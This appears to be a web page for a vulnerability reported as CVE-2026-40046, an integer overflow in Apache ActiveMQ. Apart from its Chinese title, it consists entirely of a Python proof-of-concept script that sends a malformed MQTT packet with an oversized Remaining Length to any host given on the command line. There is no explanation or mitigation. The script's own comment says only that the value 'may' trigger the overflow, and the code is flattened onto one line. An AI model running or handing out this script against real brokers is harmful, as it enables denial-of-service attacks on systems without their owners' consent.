CVE-2026-40046 Apache ActiveMQ整数溢出漏洞

#!/usr/bin/env python3 # PoC for CVE-2026-40046 (Apache ActiveMQ Integer Overflow) # This script sends a malformed MQTT packet with a specific Remaining Length to trigger the overflow. import socket def send_malformed_mqtt(host, port=1883): # MQTT Fixed Header: Packet Type (1) + Flags (0) = 0x10 # Remaining Length: 0xFF 0xFF 0xFF 0x7F (Max value, may trigger overflow/wraparound depending on implementation) payload = b"\x10" + b"\xff\xff\xff\x7f" + b"A" * 100 try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((host, port)) s.send(payload) print(f"[+] Payload sent to {host}:{port}") s.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python3 poc.py <target_ip>") else: send_malformed_mqtt(sys.argv[1])